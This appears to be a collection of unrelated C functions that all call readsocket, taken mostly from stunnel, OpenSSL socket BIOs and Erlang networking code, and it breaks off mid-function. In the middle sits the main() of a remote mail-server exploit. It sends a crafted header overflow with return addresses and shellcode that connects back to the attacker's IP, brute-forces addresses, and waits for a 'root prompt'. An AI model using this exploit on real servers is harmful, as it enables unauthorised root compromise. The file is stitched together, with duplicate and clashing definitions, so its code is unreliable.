static void common_cb(const char * src, int fd){
int rc = readsocket(fd, buffer, sizeof(buffer));
if (rc > 0) {
fcf_callback_virtdev(src, buffer, rc);
printf("RC > 0");
}
}
static int conn_read(BIO *b, char *out, int outl)
{
int ret=0;
BIO_CONNECT *data;
data=(BIO_CONNECT *)b->ptr;
if (data->state != BIO_CONN_S_OK)
{
ret=conn_state(b,data);
if (ret <= 0)
return(ret);
}
if (out != NULL)
{
clear_socket_error();
ret=readsocket(b->num,out,outl);
BIO_clear_retry_flags(b);
if (ret <= 0)
{
if (BIO_sock_should_retry(ret))
BIO_set_retry_read(b);
}
}
return(ret);
}
void read_blocking(CLI *c, int fd, u8 *ptr, int len) {
/* simulate a blocking read */
s_poll_set fds;
int num;
while(len>0) {
s_poll_zero(&fds);
s_poll_add(&fds, fd, 1, 0); /* read */
switch(s_poll_wait(&fds, c->opt->timeout_busy)) {
case -1:
sockerror("read_blocking: s_poll_wait");
longjmp(c->err, 1); /* error */
case 0:
s_log(LOG_INFO, "read_blocking: s_poll_wait timeout");
longjmp(c->err, 1); /* timeout */
case 1:
break; /* OK */
default:
s_log(LOG_ERR, "read_blocking: s_poll_wait unknown result");
longjmp(c->err, 1); /* error */
}
num=readsocket(fd, ptr, len);
switch(num) {
case -1: /* error */
sockerror("readsocket (read_blocking)");
longjmp(c->err, 1);
case 0: /* EOF */
s_log(LOG_ERR, "Unexpected socket close (read_blocking)");
longjmp(c->err, 1);
}
ptr+=num;
len-=num;
}
}
void s_read(CLI *c, int fd, void *ptr, int len) {
/* simulate a blocking read */
int num;
while(len>0) {
s_poll_init(c->fds);
s_poll_add(c->fds, fd, 1, 0); /* read */
switch(s_poll_wait(c->fds, c->opt->timeout_busy, 0)) {
case -1:
sockerror("s_read: s_poll_wait");
longjmp(c->err, 1); /* error */
case 0:
s_log(LOG_INFO, "s_read: s_poll_wait:"
" TIMEOUTbusy exceeded: sending reset");
longjmp(c->err, 1); /* timeout */
case 1:
break; /* OK */
default:
s_log(LOG_ERR, "s_read: s_poll_wait: unknown result");
longjmp(c->err, 1); /* error */
}
num=readsocket(fd, ptr, len);
switch(num) {
case -1: /* error */
sockerror("readsocket (s_read)");
longjmp(c->err, 1);
case 0: /* EOF */
s_log(LOG_ERR, "Unexpected socket close (s_read)");
longjmp(c->err, 1);
}
ptr=(u8 *)ptr+num;
len-=num;
}
}
static int fd_read(BIO *b, char *out,int outl)
#endif
{
int ret=0;
if (out != NULL)
{
#ifndef BIO_FD
clear_socket_error();
ret=readsocket(b->num,out,outl);
#else
clear_sys_error();
ret=read(b->num,out,outl);
#endif
BIO_clear_retry_flags(b);
if (ret <= 0)
{
#ifndef BIO_FD
if (BIO_sock_should_retry(ret))
#else
if (BIO_fd_should_retry(ret))
#endif
BIO_set_retry_read(b);
}
}
return(ret);
}
static int common_cb(const char *src, int fd){
int rc = readsocket(fd, buffer, sizeof(buffer));
if (rc > 0) {
sendMessage_virtdev(src, buffer, rc);
}
return rc;
}
static int ei_read_t(int fd, char* buf, int len, unsigned ms)
{
int res;
if (ms != 0) {
fd_set readmask;
struct timeval tv;
tv.tv_sec = (time_t) (ms / 1000U);
ms %= 1000U;
tv.tv_usec = (time_t) (ms * 1000U);
FD_ZERO(&readmask);
FD_SET(fd,&readmask);
switch (select(fd+1, &readmask, NULL, NULL, &tv)) {
case -1 :
return -1; /* i/o error */
case 0:
return -2; /* timeout */
default:
if (!FD_ISSET(fd, &readmask)) {
return -1; /* Other error */
}
}
}
res = readsocket(fd, buf, len);
return (res < 0) ? -1 : res;
}
char *fd_getline(CLI *c, int fd) {
char *line, *tmpline;
int ptr=0, allocated=32;
line=str_alloc(allocated);
for(;;) {
s_poll_init(c->fds);
s_poll_add(c->fds, fd, 1, 0); /* read */
switch(s_poll_wait(c->fds, c->opt->timeout_busy, 0)) {
case -1:
sockerror("fd_getline: s_poll_wait");
str_free(line);
longjmp(c->err, 1); /* error */
case 0:
s_log(LOG_INFO, "fd_getline: s_poll_wait:"
" TIMEOUTbusy exceeded: sending reset");
str_free(line);
longjmp(c->err, 1); /* timeout */
case 1:
break; /* OK */
default:
s_log(LOG_ERR, "fd_getline: s_poll_wait: Unknown result");
str_free(line);
longjmp(c->err, 1); /* error */
}
if(allocated<ptr+1) {
allocated*=2;
line=str_realloc(line, allocated);
}
switch(readsocket(fd, line+ptr, 1)) {
case -1: /* error */
sockerror("fd_getline: readsocket");
str_free(line);
longjmp(c->err, 1);
case 0: /* EOF */
s_log(LOG_ERR, "fd_getline: Unexpected socket close");
str_free(line);
longjmp(c->err, 1);
}
if(line[ptr]=='\r')
continue;
if(line[ptr]=='\n')
break;
if(line[ptr]=='\0')
break;
if(++ptr>65536) { /* >64KB --> DoS protection */
s_log(LOG_ERR, "fd_getline: Line too long");
str_free(line);
longjmp(c->err, 1);
}
}
line[ptr]='\0';
tmpline=str_dup(line);
safestring(tmpline);
s_log(LOG_DEBUG, " <- %s", tmpline);
str_free(tmpline);
return line;
}
static int common_cb (uint32_t fourcc, int fd) {
// printf_tagged_message(fourcc, "\n common_cb");
// flush_buffers();
int rc = readsocket(fd, buffer, sizeof(buffer));
if (rc > 0) {
// printbuffer(fourcc, buffer, rc); //print to screen
// write_tagged_message(fourcc, buffer, rc);
// flush_buffers();
FCF_Log(fourcc, buffer, rc);
}
return rc;
}
static int signal_pipe_dispatch(void) {
int sig, err;
s_log(LOG_DEBUG, "Dispatching signals from the signal pipe");
while(readsocket(signal_pipe[0], (char *)&sig, sizeof sig)==sizeof sig) {
switch(sig) {
#ifndef USE_WIN32
case SIGCHLD:
s_log(LOG_DEBUG, "Processing SIGCHLD");
#ifdef USE_FORK
client_status(); /* report status of client process */
#else /* USE_UCONTEXT || USE_PTHREAD */
child_status(); /* report status of libwrap or 'exec' process */
#endif /* defined USE_FORK */
break;
#endif /* !defind USE_WIN32 */
case SIGNAL_RELOAD_CONFIG:
s_log(LOG_DEBUG, "Processing SIGNAL_RELOAD_CONFIG");
err=parse_conf(NULL, CONF_RELOAD);
if(err) {
s_log(LOG_ERR, "Failed to reload the configuration file");
} else {
unbind_ports();
log_close();
apply_conf();
log_open();
if(bind_ports()) {
/* FIXME: handle the error */
}
}
break;
case SIGNAL_REOPEN_LOG:
s_log(LOG_DEBUG, "Processing SIGNAL_REOPEN_LOG");
log_close();
log_open();
s_log(LOG_NOTICE, "Log file reopened");
break;
case SIGNAL_TERMINATE:
s_log(LOG_DEBUG, "Processing SIGNAL_TERMINATE");
s_log(LOG_NOTICE, "Terminated");
return 2;
default:
s_log(LOG_ERR, "Received signal %d; terminating", sig);
return 1;
}
}
s_log(LOG_DEBUG, "Signal pipe is empty");
return 0;
}
static int sock_read(BIO *b, char *out, int outl)
{
int ret = 0;
if (out != NULL) {
clear_socket_error();
ret = readsocket(b->num, out, outl);
BIO_clear_retry_flags(b);
if (ret <= 0) {
if (BIO_sock_should_retry(ret))
BIO_set_retry_read(b);
}
}
return (ret);
}
void fdgetline(CLI *c, int fd, char *line) {
char logline[STRLEN];
s_poll_set fds;
int ptr;
for(ptr=0;;) {
s_poll_zero(&fds);
s_poll_add(&fds, fd, 1, 0); /* read */
switch(s_poll_wait(&fds, c->opt->timeout_busy)) {
case -1:
sockerror("fdgetline: s_poll_wait");
longjmp(c->err, 1); /* error */
case 0:
s_log(LOG_INFO, "fdgetline: s_poll_wait timeout");
longjmp(c->err, 1); /* timeout */
case 1:
break; /* OK */
default:
s_log(LOG_ERR, "fdgetline: s_poll_wait unknown result");
longjmp(c->err, 1); /* error */
}
switch(readsocket(fd, line+ptr, 1)) {
case -1: /* error */
sockerror("readsocket (fdgetline)");
longjmp(c->err, 1);
case 0: /* EOF */
s_log(LOG_ERR, "Unexpected socket close (fdgetline)");
longjmp(c->err, 1);
}
if(line[ptr]=='\r')
continue;
if(line[ptr]=='\n')
break;
if(!line[ptr])
break;
if(++ptr==STRLEN) {
s_log(LOG_ERR, "Input line too long");
longjmp(c->err, 1);
}
}
line[ptr]='\0';
safecopy(logline, line);
safestring(logline);
s_log(LOG_DEBUG, " <- %s", logline);
}
int main(int argc, char **argv) {
struct sockaddr_in server;
unsigned long ipaddr,i,bf=0;
int sock,target;
char tmp[BUFSIZE],buf[BUFSIZE],*p;
if (argc <= 3) {
printf("%s <target ip> <myip> <target number> [bruteforce start addr]\n",argv[0]);
printtargets();
return 0;
}
target=atol(argv[3]);
if (target < 0 || target >= maxarch) {
printtargets();
return 0;
}
if (argc > 4) sscanf(argv[4],"%x",&bf);
header();
fixshellcode(argv[2],LISTENPORT);
if (bf && !fork()) {
getrootprompt();
return 0;
}
bfstart:
if (bf) {
printf("Trying address 0x%x\n",bf);
fflush(stdout);
}
if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
printf("Unable to create socket\n");
exit(0);
}
server.sin_family = AF_INET;
server.sin_port = htons(25);
if (!bf) {
printf("Resolving address... ");
fflush(stdout);
}
if ((ipaddr = inet_addr(argv[1])) == -1) {
struct hostent *hostm;
if ((hostm=gethostbyname(argv[1])) == NULL) {
printf("Unable to resolve address\n");
exit(0);
}
memcpy((char*)&server.sin_addr, hostm->h_addr, hostm->h_length);
}
else server.sin_addr.s_addr = ipaddr;
memset(&(server.sin_zero), 0, 8);
if (!bf) {
printf("Address found\n");
printf("Connecting... ");
fflush(stdout);
}
if (connect(sock,(struct sockaddr *)&server, sizeof(server)) != 0) {
printf("Unable to connect\n");
exit(0);
}
if (!bf) {
printf("Connected!\n");
printf("Sending exploit... ");
fflush(stdout);
}
readsocket(sock,220);
writesocket(sock,"HELO yahoo.com\r\n");
readsocket(sock,250);
writesocket(sock,"MAIL FROM: [email protected]\r\n");
readsocket(sock,250);
writesocket(sock,"RCPT TO: MAILER-DAEMON\r\n");
readsocket(sock,250);
writesocket(sock,"DATA\r\n");
readsocket(sock,354);
memset(buf,0,sizeof(buf));
p=buf;
for (i=0;i<archs[target].angle;i++) {
*p++='<';
*p++='>';
}
*p++='(';
for (i=0;i<archs[target].nops;i++) *p++=0xf8;
*p++=')';
*p++=((char*)&archs[target].aptr)[0];
*p++=((char*)&archs[target].aptr)[1];
*p++=((char*)&archs[target].aptr)[2];
*p++=((char*)&archs[target].aptr)[3];
*p++=0;
sprintf(tmp,"Full-name: %s\r\n",buf);
writesocket(sock,tmp);
sprintf(tmp,"From: %s\r\n",buf);
writesocket(sock,tmp);
p=buf;
archs[target].aptr+=4;
*p++=((char*)&archs[target].aptr)[0];
*p++=((char*)&archs[target].aptr)[1];
*p++=((char*)&archs[target].aptr)[2];
*p++=((char*)&archs[target].aptr)[3];
for (i=0;i<0x14;i++) *p++=0xf8;
archs[target].aptr+=0x18;
*p++=((char*)&archs[target].aptr)[0];
*p++=((char*)&archs[target].aptr)[1];
*p++=((char*)&archs[target].aptr)[2];
*p++=((char*)&archs[target].aptr)[3];
for (i=0;i<0x4c;i++) *p++=0x01;
archs[target].aptr+=0x4c+4;
*p++=((char*)&archs[target].aptr)[0];
*p++=((char*)&archs[target].aptr)[1];
*p++=((char*)&archs[target].aptr)[2];
*p++=((char*)&archs[target].aptr)[3];
for (i=0;i<0x8;i++) *p++=0xf8;
archs[target].aptr+=0x08+4;
*p++=((char*)&archs[target].aptr)[0];
*p++=((char*)&archs[target].aptr)[1];
*p++=((char*)&archs[target].aptr)[2];
*p++=((char*)&archs[target].aptr)[3];
for (i=0;i<0x20;i++) *p++=0xf8;
for (i=0;i<strlen(code);i++) *p++=code[i];
*p++=0;
sprintf(tmp,"Subject: AAAAAAAAAAA%s\r\n",buf);
writesocket(sock,tmp);
writesocket(sock,".\r\n");
if (!bf) {
printf("Exploit sent!\n");
printf("Waiting for root prompt...\n");
if (readutil(sock,451)) printf("Failed!\n");
else getrootprompt();
}
else {
readutil(sock,451);
close(sock);
bf+=4;
goto bfstart;
}
}
/****************************** transfer data */
static int transfer(CLI *c) {
int num, err;
int check_SSL_pending;
enum {CL_OPEN, CL_INIT, CL_RETRY, CL_CLOSED} ssl_closing=CL_OPEN;
int watchdog=0; /* a counter to detect an infinite loop */
c->sock_ptr=c->ssl_ptr=0;
sock_rd=sock_wr=ssl_rd=ssl_wr=1;
c->sock_bytes=c->ssl_bytes=0;
do { /* main loop */
/* set flag to try and read any buffered SSL data
* if we made room in the buffer by writing to the socket */
check_SSL_pending=0;
/****************************** setup c->fds structure */
s_poll_zero(&c->fds); /* Initialize the structure */
if(sock_rd && c->sock_ptr<BUFFSIZE) /* socket input buffer not full*/
s_poll_add(&c->fds, c->sock_rfd->fd, 1, 0);
if((ssl_rd && c->ssl_ptr<BUFFSIZE) || /* SSL input buffer not full */
((c->sock_ptr || ssl_closing==CL_RETRY) && want_rd))
/* want to SSL_write or SSL_shutdown but read from the
* underlying socket needed for the SSL protocol */
s_poll_add(&c->fds, c->ssl_rfd->fd, 1, 0);
if(c->ssl_ptr) /* SSL input buffer not empty */
s_poll_add(&c->fds, c->sock_wfd->fd, 0, 1);
if(c->sock_ptr || /* socket input buffer not empty */
ssl_closing==CL_INIT /* need to send close_notify */ ||
((c->ssl_ptr<BUFFSIZE || ssl_closing==CL_RETRY) && want_wr))
/* want to SSL_read or SSL_shutdown but write to the
* underlying socket needed for the SSL protocol */
s_poll_add(&c->fds, c->ssl_wfd->fd, 0, 1);
/****************************** wait for an event */
err=s_poll_wait(&c->fds, (sock_rd && ssl_rd) /* both peers open */ ||
c->ssl_ptr /* data buffered to write to socket */ ||
c->sock_ptr /* data buffered to write to SSL */ ?
c->opt->timeout_idle : c->opt->timeout_close);
switch(err) {
case -1:
sockerror("transfer: s_poll_wait");
return -1;
case 0: /* timeout */
if((sock_rd && ssl_rd) || c->ssl_ptr || c->sock_ptr) {
s_log(LOG_INFO, "s_poll_wait timeout: connection reset");
return -1;
} else { /* already closing connection */
s_log(LOG_INFO, "s_poll_wait timeout: connection close");
return 0; /* OK */
}
}
if(!(sock_can_rd || sock_can_wr || ssl_can_rd || ssl_can_wr)) {
s_log(LOG_ERR, "INTERNAL ERROR: "
"s_poll_wait returned %d, but no descriptor is ready", err);
return -1;
}
/****************************** send SSL close_notify message */
if(ssl_closing==CL_INIT || (ssl_closing==CL_RETRY &&
((want_rd && ssl_can_rd) || (want_wr && ssl_can_wr)))) {
switch(SSL_shutdown(c->ssl)) { /* Send close_notify */
case 1: /* the shutdown was successfully completed */
s_log(LOG_INFO, "SSL_shutdown successfully sent close_notify");
ssl_closing=CL_CLOSED; /* done! */
break;
case 0: /* the shutdown is not yet finished */
s_log(LOG_DEBUG, "SSL_shutdown retrying");
ssl_closing=CL_RETRY; /* retry next time */
break;
case -1: /* a fatal error occurred */
sslerror("SSL_shutdown");
return -1;
}
}
/****************************** write to socket */
if(sock_wr && sock_can_wr) {
/* for stunnel to tell web server the remote ip address */
add_remote_ip_to_header(c);
num=writesocket(c->sock_wfd->fd, c->ssl_buff, c->ssl_ptr);
switch(num) {
case -1: /* error */
if(parse_socket_error("writesocket"))
return -1;
break;
case 0:
s_log(LOG_DEBUG, "No data written to the socket: retrying");
break;
default:
memmove(c->ssl_buff, c->ssl_buff+num, c->ssl_ptr-num);
if(c->ssl_ptr==BUFFSIZE) /* buffer was previously full */
check_SSL_pending=1; /* check for data buffered by SSL */
c->ssl_ptr-=num;
c->sock_bytes+=num;
watchdog=0; /* reset watchdog */
}
}
/****************************** write to SSL */
if(ssl_wr && c->sock_ptr && ( /* output buffer not empty */
ssl_can_wr || (want_rd && ssl_can_rd)
/* SSL_write wants to read from the underlying descriptor */
)) {
num=SSL_write(c->ssl, c->sock_buff, c->sock_ptr);
switch(err=SSL_get_error(c->ssl, num)) {
case SSL_ERROR_NONE:
memmove(c->sock_buff, c->sock_buff+num, c->sock_ptr-num);
c->sock_ptr-=num;
c->ssl_bytes+=num;
watchdog=0; /* reset watchdog */
break;
case SSL_ERROR_WANT_WRITE:
s_log(LOG_DEBUG, "SSL_write returned WANT_WRITE: retrying");
break;
case SSL_ERROR_WANT_READ:
s_log(LOG_DEBUG, "SSL_write returned WANT_READ: retrying");
break;
case SSL_ERROR_WANT_X509_LOOKUP:
s_log(LOG_DEBUG,
"SSL_write returned WANT_X509_LOOKUP: retrying");
break;
case SSL_ERROR_SYSCALL: /* really an error */
if(num && parse_socket_error("SSL_write"))
return -1;
break;
case SSL_ERROR_ZERO_RETURN: /* close_notify received */
s_log(LOG_DEBUG, "SSL closed on SSL_write");
ssl_rd=0;
break;
case SSL_ERROR_SSL:
sslerror("SSL_write");
return -1;
default:
s_log(LOG_ERR, "SSL_write/SSL_get_error returned %d", err);
return -1;
}
}
/****************************** read from socket */
if(sock_rd && sock_can_rd) {
num=readsocket(c->sock_rfd->fd,
c->sock_buff+c->sock_ptr, BUFFSIZE-c->sock_ptr);
switch(num) {
case -1:
if(parse_socket_error("readsocket"))
return -1;
break;
case 0: /* close */
s_log(LOG_DEBUG, "Socket closed on read");
sock_rd=0;
break;
default:
c->sock_ptr+=num;
watchdog=0; /* reset watchdog */
}
}
/****************************** read from SSL */
if(ssl_rd && c->ssl_ptr<BUFFSIZE && ( /* input buffer not full */
ssl_can_rd || (want_wr && ssl_can_wr) ||
/* SSL_read wants to write to the underlying descriptor */
(check_SSL_pending && SSL_pending(c->ssl))
/* write made space from full buffer */
)) {
num=SSL_read(c->ssl, c->ssl_buff+c->ssl_ptr, BUFFSIZE-c->ssl_ptr);
switch(err=SSL_get_error(c->ssl, num)) {
case SSL_ERROR_NONE:
c->ssl_ptr+=num;
watchdog=0; /* reset watchdog */
break;
case SSL_ERROR_WANT_WRITE:
s_log(LOG_DEBUG, "SSL_read returned WANT_WRITE: retrying");
break;
case SSL_ERROR_WANT_READ:
s_log(LOG_DEBUG, "SSL_read returned WANT_READ: retrying");
break;
case SSL_ERROR_WANT_X509_LOOKUP:
s_log(LOG_DEBUG,
"SSL_read returned WANT_X509_LOOKUP: retrying");
break;
case SSL_ERROR_SYSCALL:
if(!num) { /* EOF */
if(c->sock_ptr) {
s_log(LOG_ERR,
"SSL socket closed with %d byte(s) in buffer",
c->sock_ptr);
return -1; /* reset the socket */
}
s_log(LOG_DEBUG, "SSL socket closed on SSL_read");
ssl_rd=ssl_wr=0; /* buggy or SSLv2 peer: no close_notify */
ssl_closing=CL_CLOSED; /* don't try to send it back */
} else if(parse_socket_error("SSL_read"))
return -1;
break;
case SSL_ERROR_ZERO_RETURN: /* close_notify received */
s_log(LOG_DEBUG, "SSL closed on SSL_read");
ssl_rd=0;
break;
case SSL_ERROR_SSL:
sslerror("SSL_read");
return -1;
default:
s_log(LOG_ERR, "SSL_read/SSL_get_error returned %d", err);
return -1;
}
}
/****************************** check write shutdown conditions */
if(sock_wr && !ssl_rd && !c->ssl_ptr) {
s_log(LOG_DEBUG, "Socket write shutdown");
sock_wr=0; /* no further write allowed */
shutdown(c->sock_wfd->fd, SHUT_WR); /* send TCP FIN */
}
if(ssl_wr && (!sock_rd || SSL_get_shutdown(c->ssl)) && !c->sock_ptr) {
s_log(LOG_DEBUG, "SSL write shutdown");
ssl_wr=0; /* no further write allowed */
if(strcmp(SSL_get_version(c->ssl), "SSLv2")) { /* SSLv3, TLSv1 */
ssl_closing=CL_INIT; /* initiate close_notify */
} else { /* no alerts in SSLv2 including close_notify alert */
shutdown(c->sock_rfd->fd, SHUT_RD); /* notify the kernel */
shutdown(c->sock_wfd->fd, SHUT_WR); /* send TCP FIN */
SSL_set_shutdown(c->ssl, /* notify the OpenSSL library */
SSL_SENT_SHUTDOWN|SSL_RECEIVED_SHUTDOWN);
ssl_rd=0; /* no further read allowed */
ssl_closing=CL_CLOSED; /* closed */
}
}
if(ssl_closing==CL_RETRY) { /* SSL shutdown */
if(!want_rd && !want_wr) { /* close_notify alert was received */
s_log(LOG_DEBUG, "SSL doesn't need to read or write");
ssl_closing=CL_CLOSED;
}
if(watchdog>5) {
s_log(LOG_NOTICE, "Too many retries on SSL shutdown");
ssl_closing=CL_CLOSED;
}
}
/****************************** check watchdog */
if(++watchdog>100) { /* loop executes without transferring any data */
s_log(LOG_ERR,
"transfer() loop executes not transferring any data");
s_log(LOG_ERR,
"please report the problem to [email protected]");
s_log(LOG_ERR, "socket open: rd=%s wr=%s, ssl open: rd=%s wr=%s",
sock_rd ? "yes" : "no", sock_wr ? "yes" : "no",
ssl_rd ? "yes" : "no", ssl_wr ? "yes" : "no");
s_log(LOG_ERR, "socket ready: rd=%s wr=%s, ssl ready: rd=%s wr=%s",
sock_can_rd ? "yes" : "no", sock_can_wr ? "yes" : "no",
ssl_can_rd ? "yes" : "no", ssl_can_wr ? "yes" : "no");
s_log(LOG_ERR, "ssl want: rd=%s wr=%s",
want_rd ? "yes" : "no", want_wr ? "yes" : "no");
s_log(LOG_ERR, "socket input buffer: %d byte(s), "
"ssl input buffer: %d byte(s)", c->sock_ptr, c->ssl_ptr);
s_log(LOG_ERR, "check_SSL_pending=%d, ssl_closing=%d",
check_SSL_pending, ssl_closing);
return -1;
}
} while(sock_wr || ssl_closing!=CL_CLOSED);
return 0; /* OK */
}
/****************************** transfer data */
static void transfer(CLI *c) {
int watchdog=0; /* a counter to detect an infinite loop */
int num, err;
/* logical channels (not file descriptors!) open for read or write */
int sock_open_rd=1, sock_open_wr=1, ssl_open_rd=1, ssl_open_wr=1;
/* awaited conditions on SSL file descriptors */
int shutdown_wants_read=0, shutdown_wants_write=0;
int read_wants_read, read_wants_write=0;
int write_wants_read=0, write_wants_write;
/* actual conditions on file descriptors */
int sock_can_rd, sock_can_wr, ssl_can_rd, ssl_can_wr;
c->sock_ptr=c->ssl_ptr=0;
do { /* main loop of client data transfer */
/****************************** initialize *_wants_* */
read_wants_read=
ssl_open_rd && c->ssl_ptr<BUFFSIZE && !read_wants_write;
write_wants_write=
ssl_open_wr && c->sock_ptr && !write_wants_read;
/****************************** setup c->fds structure */
s_poll_init(&c->fds); /* initialize the structure */
/* for plain socket open data strem = open file descriptor */
/* make sure to add each open socket to receive exceptions! */
if(sock_open_rd)
s_poll_add(&c->fds, c->sock_rfd->fd, c->sock_ptr<BUFFSIZE, 0);
if(sock_open_wr)
s_poll_add(&c->fds, c->sock_wfd->fd, 0, c->ssl_ptr);
/* for SSL assume that sockets are open if there any pending requests */
if(read_wants_read || write_wants_read || shutdown_wants_read)
s_poll_add(&c->fds, c->ssl_rfd->fd, 1, 0);
if(read_wants_write || write_wants_write || shutdown_wants_write)
s_poll_add(&c->fds, c->ssl_wfd->fd, 0, 1);
/****************************** wait for an event */
err=s_poll_wait(&c->fds,
(sock_open_rd && ssl_open_rd) /* both peers open */ ||
c->ssl_ptr /* data buffered to write to socket */ ||
c->sock_ptr /* data buffered to write to SSL */ ?
c->opt->timeout_idle : c->opt->timeout_close, 0);
switch(err) {
case -1:
sockerror("transfer: s_poll_wait");
longjmp(c->err, 1);
case 0: /* timeout */
if((sock_open_rd && ssl_open_rd) || c->ssl_ptr || c->sock_ptr) {
s_log(LOG_INFO, "transfer: s_poll_wait:"
" TIMEOUTidle exceeded: sending reset");
longjmp(c->err, 1);
} else { /* already closing connection */
s_log(LOG_ERR, "transfer: s_poll_wait:"
" TIMEOUTclose exceeded: closing");
return; /* OK */
}
}
/****************************** check for errors on sockets */
err=s_poll_error(&c->fds, c->sock_rfd->fd);
if(err) {
s_log(LOG_NOTICE,
"Error detected on socket (read) file descriptor: %s (%d)",
s_strerror(err), err);
longjmp(c->err, 1);
}
if(c->sock_wfd->fd != c->sock_rfd->fd) { /* performance optimization */
err=s_poll_error(&c->fds, c->sock_wfd->fd);
if(err) {
s_log(LOG_NOTICE,
"Error detected on socket write file descriptor: %s (%d)",
s_strerror(err), err);
longjmp(c->err, 1);
}
}
err=s_poll_error(&c->fds, c->ssl_rfd->fd);
if(err) {
s_log(LOG_NOTICE,
"Error detected on SSL (read) file descriptor: %s (%d)",
s_strerror(err), err);
longjmp(c->err, 1);
}
if(c->ssl_wfd->fd != c->ssl_rfd->fd) { /* performance optimization */
err=s_poll_error(&c->fds, c->ssl_wfd->fd);
if(err) {
s_log(LOG_NOTICE,
"Error detected on SSL write file descriptor: %s (%d)",
s_strerror(err), err);
longjmp(c->err, 1);
}
}
/****************************** retrieve results from c->fds */
sock_can_rd=s_poll_canread(&c->fds, c->sock_rfd->fd);
sock_can_wr=s_poll_canwrite(&c->fds, c->sock_wfd->fd);
ssl_can_rd=s_poll_canread(&c->fds, c->ssl_rfd->fd);
ssl_can_wr=s_poll_canwrite(&c->fds, c->ssl_wfd->fd);
/****************************** checks for internal failures */
/* please report any internal errors to stunnel-users mailing list */
if(!(sock_can_rd || sock_can_wr || ssl_can_rd || ssl_can_wr)) {
s_log(LOG_ERR, "INTERNAL ERROR: "
"s_poll_wait returned %d, but no descriptor is ready", err);
longjmp(c->err, 1);
}
/* these checks should no longer be needed */
/* I'm going to remove them soon */
if(!sock_open_rd && sock_can_rd) {
err=get_socket_error(c->sock_rfd->fd);
if(err) { /* really an error? */
s_log(LOG_ERR, "INTERNAL ERROR: "
"Closed socket ready to read: %s (%d)",
s_strerror(err), err);
longjmp(c->err, 1);
}
if(c->ssl_ptr) { /* anything left to write */
s_log(LOG_ERR, "INTERNAL ERROR: "
"Closed socket ready to read: sending reset");
longjmp(c->err, 1);
}
s_log(LOG_ERR, "INTERNAL ERROR: "
"Closed socket ready to read: write close");
sock_open_wr=0; /* no further write allowed */
shutdown(c->sock_wfd->fd, SHUT_WR); /* send TCP FIN */
}
/****************************** send SSL close_notify message */
if(shutdown_wants_read || shutdown_wants_write) {
shutdown_wants_read=shutdown_wants_write=0;
num=SSL_shutdown(c->ssl); /* send close_notify */
if(num<0) /* -1 - not completed */
err=SSL_get_error(c->ssl, num);
else /* 0 or 1 - success */
err=SSL_ERROR_NONE;
switch(err) {
case SSL_ERROR_NONE: /* the shutdown was successfully completed */
s_log(LOG_INFO, "SSL_shutdown successfully sent close_notify");
break;
case SSL_ERROR_WANT_WRITE:
s_log(LOG_DEBUG, "SSL_shutdown returned WANT_WRITE: retrying");
shutdown_wants_write=1;
break;
case SSL_ERROR_WANT_READ:
s_log(LOG_DEBUG, "SSL_shutdown returned WANT_READ: retrying");
shutdown_wants_read=1;
break;
case SSL_ERROR_SYSCALL: /* socket error */
parse_socket_error(c, "SSL_shutdown");
break;
case SSL_ERROR_SSL: /* SSL error */
sslerror("SSL_shutdown");
longjmp(c->err, 1);
default:
s_log(LOG_ERR, "SSL_shutdown/SSL_get_error returned %d", err);
longjmp(c->err, 1);
}
}
/****************************** read from socket */
if(sock_open_rd && sock_can_rd) {
num=readsocket(c->sock_rfd->fd,
c->sock_buff+c->sock_ptr, BUFFSIZE-c->sock_ptr);
switch(num) {
case -1:
parse_socket_error(c, "readsocket");
break;
case 0: /* close */
s_log(LOG_DEBUG, "Socket closed on read");
sock_open_rd=0;
break;
default:
c->sock_ptr+=num;
watchdog=0; /* reset watchdog */
}
}
/****************************** write to socket */
if(sock_open_wr && sock_can_wr) {
num=writesocket(c->sock_wfd->fd, c->ssl_buff, c->ssl_ptr);
switch(num) {
case -1: /* error */
parse_socket_error(c, "writesocket");
break;
case 0:
s_log(LOG_DEBUG, "No data written to the socket: retrying");
break;
default:
memmove(c->ssl_buff, c->ssl_buff+num, c->ssl_ptr-num);
c->ssl_ptr-=num;
c->sock_bytes+=num;
watchdog=0; /* reset watchdog */
}
}
/****************************** update *_wants_* based on new *_ptr */
/* this update is also required for SSL_pending() to be used */
read_wants_read=
ssl_open_rd && c->ssl_ptr<BUFFSIZE && !read_wants_write;
write_wants_write=
ssl_open_wr && c->sock_ptr && !write_wants_read;
/****************************** read from SSL */
if((read_wants_read && (ssl_can_rd || SSL_pending(c->ssl))) ||
/* it may be possible to read some pending data after
* writesocket() above made some room in c->ssl_buff */
(read_wants_write && ssl_can_wr)) {
read_wants_write=0;
num=SSL_read(c->ssl, c->ssl_buff+c->ssl_ptr, BUFFSIZE-c->ssl_ptr);
switch(err=SSL_get_error(c->ssl, num)) {
case SSL_ERROR_NONE:
c->ssl_ptr+=num;
watchdog=0; /* reset watchdog */
break;
case SSL_ERROR_WANT_WRITE:
s_log(LOG_DEBUG, "SSL_read returned WANT_WRITE: retrying");
read_wants_write=1;
break;
case SSL_ERROR_WANT_READ: /* nothing unexpected */
break;
case SSL_ERROR_WANT_X509_LOOKUP:
s_log(LOG_DEBUG,
"SSL_read returned WANT_X509_LOOKUP: retrying");
break;
case SSL_ERROR_SYSCALL:
if(!num) { /* EOF */
if(c->sock_ptr) {
s_log(LOG_ERR,
"SSL socket closed on SSL_read "
"with %d byte(s) in buffer",
c->sock_ptr);
longjmp(c->err, 1); /* reset the socket */
}
s_log(LOG_DEBUG, "SSL socket closed on SSL_read");
ssl_open_rd=ssl_open_wr=0; /* buggy peer: no close_notify */
} else
parse_socket_error(c, "SSL_read");
break;
case SSL_ERROR_ZERO_RETURN: /* close_notify received */
s_log(LOG_DEBUG, "SSL closed on SSL_read");
ssl_open_rd=0;
if(!strcmp(SSL_get_version(c->ssl), "SSLv2"))
ssl_open_wr=0;
break;
case SSL_ERROR_SSL:
sslerror("SSL_read");
longjmp(c->err, 1);
default:
s_log(LOG_ERR, "SSL_read/SSL_get_error returned %d", err);
longjmp(c->err, 1);
}
}
/****************************** write to SSL */
if((write_wants_read && ssl_can_rd) ||
(write_wants_write && ssl_can_wr)) {
write_wants_read=0;
num=SSL_write(c->ssl, c->sock_buff, c->sock_ptr);
switch(err=SSL_get_error(c->ssl, num)) {
case SSL_ERROR_NONE:
memmove(c->sock_buff, c->sock_buff+num, c->sock_ptr-num);
c->sock_ptr-=num;
c->ssl_bytes+=num;
watchdog=0; /* reset watchdog */
break;
case SSL_ERROR_WANT_WRITE: /* nothing unexpected */
break;
case SSL_ERROR_WANT_READ:
